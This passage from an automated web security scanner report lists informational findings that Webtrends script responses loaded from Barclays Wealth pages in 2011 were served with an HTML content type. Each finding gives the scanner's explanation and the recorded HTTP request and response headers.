28.53. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5725a79065efa59d13f9854b8ffb4ff341cffa3c6c9da58c217b271a6094a91e104586061876c763ee9b299bde51a0fdfcafe22b51b43b81151e38bd553d9ab12d86842469408e2c25235d69ff48909d6a1a40767224ad1f142eb09b156138703056de3ff2bcdf6bfed885ff56d970342c76a45c00c442ea6aafb451028e858ac6409ca0ea7ba1aa3549cfe1f7c9fcb1eb83a6dac42c0a61ffc049613d21d3baf2c09e51a9d1cda3830fff136da5cfa5d813450463c1ecda7d2e9d53971c4e5be8dd29cf8d8aab3083f4ee0cececa81041e15c81f6d158200d1530d2e73c856ca48afa6bef559bb3f1057f274626e5869d7695f243e3ff6a47b6697323f483515143f0fc99e12cb8abda344d8123fd373a73000456974ff8bd27744065c04e26ad0fcc2f813dc1b5a92d77e13e144dd4f11e933a595458fb03eedba83077f2a47f279e6f61b6874486c0577b8e5

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5725a79065efa59d13f9854b8ffb4ff341cffa3c6c9da58c217b271a6094a91e104586061876c763ee9b299bde51a0fdfcafe22b51b43b81151e38bd553d9ab12d86842469408e2c25235d69ff48909d6a1a40767224ad1f142eb09b156138703056de3ff2bcdf6bfed885ff56d970342c76a45c00c442ea6aafb451028e858ac6409ca0ea7ba1aa3549cfe1f7c9fcb1eb83a6dac42c0a61ffc049613d21d3baf2c09e51a9d1cda3830fff136da5cfa5d813450463c1ecda7d2e9d53971c4e5be8dd29cf8d8aab3083f4ee0cececa81041e15c81f6d158200d1530d2e73c856ca48afa6bef559bb3f1057f274626e5869d7695f243e3ff6a47b6697323f483515143f0fc99e12cb8abda344d8123fd373a73000456974ff8bd27744065c04e26ad0fcc2f813dc1b5a92d77e13e144dd4f11e933a595458fb03eedba83077f2a47f279e6f61b6874486c0577b8e5

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5725a79065efa59d13f9854b8ffb4ff341cffa3c6c9da58c217b271a6094a91e104586061876c763ee9b299bde51a0fdfcafe22b51b43b81151e38bd553d9ab12d86842469408e2c25235d69ff48909d6a1a40767224ad1f142eb09b156138703056de3ff2bcdf6bfed885ff56d970342c76a45c00c442ea6aafb451028e858ac6409ca0ea7ba1aa3549cfe1f7c9fcb1eb83a6dac42c0a61ffc049613d21d3baf2c09e51a9d1cda3830fff136da5cfa5d813450463c1ecda7d2e9d53971c4e5be8dd29cf8d8aab3083f4ee0cececa81041e15c81f6d158200d1530d2e73c856ca48afa6bef559bb3f1057f274626e5869d7695f243e3ff6a47b6697323f483515143f0fc99e12cb8abda344d8123fd373a73000456974ff8bd27744065c04e26ad0fcc2f813dc1b5a92d77e13e144dd4f11e933a595458fb03eedba83077f2a47f279e6f61b6874486c0577b8e5 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2D0CE6DA7B82936A31CBC9ACE233AAA7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e93200beff43; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=74DD24DA05D7E85933AC1283D8E7C849; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932037bbb78; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2003676f9; Expires=Sun, 01-Jan-2012 00:02:06 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.54. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=59A67E9E4A42771D4AE9AAE699FFE647; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00bb0854; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d016e163d; _wt.mode-79569=fcdcc722e93203b7c335

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:29:51 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.mode-79569=fcdcc722e9320333bd69; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee; Expires=Sun, 01-Jan-2012 00:29:51 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.55. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us/corporate-social-responsibility.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=93530B2177889BE5371E306CA55F4229; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2008dfa14; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d042f457f; _wt.mode-79569=fcdcc722e93202d188d0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=27DB104FF240B21CA30EC91928AC60D3; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e93201f611e1; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a059683f7; Expires=Sun, 01-Jan-2012 00:03:06 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.56. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392deb9e91585f035b3a35cd925087e761247a6fade9720dc2253cb41cf81885470770d955ab4acb239f14bfe72a4ddb25c56203f36663201e127f7abd60b0392424be18baebafe451e1f63305b9c721ab72a4f74205059da3f3e4d19602a7225fc98746eae27270322364a9f84488ce4e91ae6a939ffedaac315747c9771ba2317479c1dd3522b852064815ef645eae714a67f92f1921145aa35e9969c917e3a6ebf92c40e9f7d28cc04e8342ff3ffd2a1b9ff93d33774ca86c470dcb92ad9fd92936a0fb8345836e22c11737f2cc991681ac289d7e5302fb55bd9d0f76da89a7890bd6a1a5116a365bcd8654f218c63164de43662abdab3dd6e7bdc7b26cc44bea6d25e04c03fa5d1c6d8d9ced6e153dbe12d125489453b4b100a75e9bf11a679acf19bb2165a14fcba51ffd079714c50820e47d59b96dcb598e652bfceb7a9e07ae5d813450463c1ecda4d2e9d53971c4e5a18dda87fad8acb7133744e9c1cdd1941e797c935a3347970fca5b173a67b9388c0df5e9a5f643b2270f55e16f75083e249b3213372a2ce9ff3c25c571635b2a067c7d42ded35998dabcb622b251729c2aa76f1b4d7a3cebe7ec6451594512ed7f87e2c7f243d24d019d8c7e13ad44c44e08af75ffcf03cca073ac88e6695f4f67e671f3ac1a796a5370cd913d1849836ac9f1f23aa297a1ab08da6ba0130026547dd8c1170f58565beab11e480e81e48d450243bfe5b61dd253e4431988cdeac8b0645d2e13b24a932e0f7935ad5ee0299184ad98013035f80ecc4cd6d5beb6c2766a03640af7cf08981f57f2aed80cb49ba973888da08d2c425aa8007e717b426d0c37ea7fa07ab55e8f101f6a32c829c82219c00b418d227c466ce5527499081d588fdfc201a24f82f44ba1b6d2fff9784cb56fcd9dbd32d27e68119df750079367005de70b577fe2f5408cb8a5f156bd582e6cc643159002e488b9ceed902c63b7b84a4a9d9276d3f81d9620a28d093d33704eb82ccdfef7d42de37d6a36441761954b1d4e12d19d91b2673122d399135a883a1bb889d27634308f762549a9f88297f61d25938a71c3d7d8216b2f5483ea58e018de7299fe1cf1a0489140fea591a58201a567a3c1948f8518f9db1ffe2faa1599886c3aba43e1d54c8742af6afde943e5bd6813debe2715b17647cfaa8229a10b8657bc222c6abfb504dd7a1610a568cc4de9e7828d9eac55c202462abf6a77a63cceb61d5764797fdf126fd2b1e22b72e30cc097b48908cd6f4ff0aecc93cd74add7247d3f4add823266d05dfe655f27243a2d7e151860781e1b56718d16e3a3d5173c463904e857fd HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/important-information.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=DE896946856589AC32A1D6B5BBB2DDE9; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0406738a; _wt.mode-79569=fcdcc722e93204194090

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:17 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A03C4F80BFCFBF92FCB64700ED6E25D0; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932043ee114; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00bb0854; Expires=Sun, 01-Jan-2012 00:03:17 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.57. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05d90d4830aed146528bc7a64ca8ada47c6bf82900592c70ecc3cf0b1540026e67dac30bd8f67c33172cefc55102800212a019e71c8816622a8e05f10e934ccb5dfda43050f415957009a93c2264405b2733e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adffbb0ddf19506aa1b79ffc81dbccf544d4c1440b6bf54cd895f8da9688aa5bdc0a67d4426af046a81046c53e4aa435fb61e110b17a27b1bf4335d67ab704b7c1146fd4b993c954ebbb8b9f7775be2a090d18414c00cb475a10d559cbd1008554cbf510f1ac594b789c7220ccac8ab7cbe4718f4500df296901685f020a1244a11fb6c96cf271db3fbc9e04d8bfaf9402f73078ac73ff713c32865df512b24b3ea21d0eaa6e4a43a9d58ea0743cb6d22de2b7509878fc77c403faf109124548857bce20bbf5c99a24c64c9991cbc396ca84692a505ae0d901bc6053be6674aa51ada449b125b82ba32fb4ced09c86478692535e794be8ca34d0ca1e7d0cf9ec8bf82fedf4e7a09a1a68b9cd7500419c41f67108d03dd5e022071c856cd4caba6a9fc51b3391c4af22b2957755ac6705e6e2627e5fe3a3dc3206c047b010e4475  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-Type statement: text/html;charset=UTF-8. The response states that it contains HTML, but the body is generated by js.jsp, a script resource served from /ots/ots/js-3.0/, and opens with a /** ... */ comment block that the scanner's heuristic classified as CSS; it appears to contain JavaScript rather than HTML. No X-Content-Type-Options: nosniff header is sent. The mislabel is harmless only while browsers execute the script regardless of its declared type: a browser with strict MIME checking enabled (which nosniff turns on) refuses to run a script delivered as text/html, and a text/html response that is navigated to directly is rendered as a page rather than displayed as source.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=83141D1BF679315B3A6FE0130C26720B; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:09 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; Expires=Sat, 31-Dec-2011 23:58:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93200beff43; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959; Expires=Sat, 31-Dec-2011 23:58:10 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 45071


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.58. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a4589da09c95ec229342c85e3f04cdbb16eb68a479511547be78c1f0ed28bf417fafde52976aa735f427b71fe8ad1715b035931319a897b9da02c6a51709fd25f0ace2d1ab125b84dc11d0f68db4aee0d9d318306ccb23066c323cb2576b76864311a0a6a78f826f1277675fc4bfaa881c308e9f4003895cb78e65bc2cd7f2a3a9db2ffe3c0c918a12d40e4da1faebc2c2f3e363ce6b956cb87449bb223c081afa8d2152643cc7c0db0256c63e1b01a4ee608554900b86d0eb0694234ae670572150bbe11cc6dc85be5a2b8a12c4cbdfac68ed45f933eff36ed2e70f4b20f295557ae5a5008cd9b80affb0b36b3ec9e4ee47402e1451ce8dba70a9cbb07aa7a481dc807e8d0526dd493a0850bd9a1a40b6c345ad0824ef71bc32f76c2512561f7fb08daf5ace9f5228557ba2262b6430be204cc1a18  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-Type statement: text/html;charset=UTF-8. The response states that it contains HTML, but the body is generated by js.jsp and opens with a /** ... */ comment block, which the scanner's heuristic classified as CSS; it appears to contain JavaScript rather than HTML.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:08 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=83141D1BF679315B3A6FE0130C26720B; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.59. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-Type statement: text/html;charset=UTF-8. The response states that it contains HTML, but the body is generated by js.jsp and opens with a /** ... */ comment block, which the scanner's heuristic classified as CSS; it appears to contain JavaScript rather than HTML.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
